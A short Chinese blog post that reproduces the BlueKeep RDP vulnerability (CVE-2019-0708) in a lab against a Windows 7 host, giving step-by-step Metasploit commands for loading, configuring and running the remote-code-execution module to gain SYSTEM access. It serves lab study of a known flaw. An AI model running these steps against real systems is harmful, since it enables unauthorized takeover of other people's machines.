CVE-2019-0708漏洞复现

发布于 2019-10-29  732 次阅读


测试环境:攻击机:kali2019.2 靶机: win7 sp1

替换文件:

cve_2019_0708_bluekeep_rce.rb  替换  /usr/share/metasploit-framework/modules/exploit/windows/rdp/

rdp.rb  替换  /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb 替换  /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb 替换 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

来看下windows 7 需要注意的地方

1  windows 3389需要开启

2  防火墙需要关闭

攻击步骤

用nmap探测ip段,发现windows 7 的ip为:192.168.43.219

然后     msf5>reload_all   //重新加载所有模块

查找插件位置:msf5 > search 0708

漏洞的插件的位置在:exploit/windows/rdp/cve_2019_0708_bluekeep_rce

加载插件:msf5> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

查看插件配置模块 :msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >show options

配置插件选项

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RHOST 192.168.43.219    msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1

这里设置目标为3(set target 3),会出现蓝屏现象,因此这里设置target 1是获取权限

然后run尝试运行

查看权限为系统权限


只有站在顶端的人才能定义所谓的善恶。